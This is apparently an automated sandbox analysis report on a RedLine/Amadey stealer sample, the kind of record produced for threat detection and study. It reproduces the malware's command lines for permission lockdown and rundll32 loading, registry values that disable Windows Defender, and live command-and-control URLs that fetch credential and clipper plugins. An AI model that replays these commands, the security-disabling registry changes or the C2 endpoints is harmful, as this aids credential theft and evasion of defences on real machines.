Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008D7AFC cpuid

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00077155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008E3C76 _free,_free,_free,GetTimeZoneInformation,_free,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 4_2_00007FF9A5D4077D GetUserNameA,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4b3b820.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4b3b820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 19.2.rundll32.exe.6e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	1 Services File Permissions Weakness	111 Process Injection	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Registry Run Keys / Startup Folder	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	1 Services File Permissions Weakness	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	111 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	64%	ReversingLabs	Win32.Trojan.RedLine
file.exe	53%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	81%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	62%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	49%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Disabler
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	81%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label	Link
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpoft	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phprundll32.exe=	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	2%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/index.phpa	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpd	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpm32	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpi	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpn	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpion	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phps	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php5342a2	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php4	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php(l	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php9e5342a2	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpp	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpH	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php8	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpC	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpZI	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpa106e76	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phprundll32.exel	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpQ	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpR	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpix	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	100%	Avira URL Cloud	malware
62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware
http://62.204.41.4/Gol478Ns/index.phprundll32.exe#	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	true	Avira URL Cloud: malware	unknown
62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	low
http://62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/index.phpoft	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exe=	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpd	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpa	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpm32	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpn	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpi	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpion	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php5342a2	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phps	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php4	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpp	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php(l	mnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php8	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpC	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls	mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php9e5342a2	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpH	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exel	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpa106e76	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpZI	mnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpix	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpQ	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exe#	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpR	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.4	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800795
Start date and time:	2023-02-07 19:55:34 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 58s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 40.7% (good quality ratio 39%) Quality average: 85% Quality standard deviation: 24.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, login.live.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, config.edge.skype.com, www-www.bing.com.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:57:03	Task Scheduler	Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
19:57:03	API Interceptor	2455x Sleep call for process: mnolyk.exe modified

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
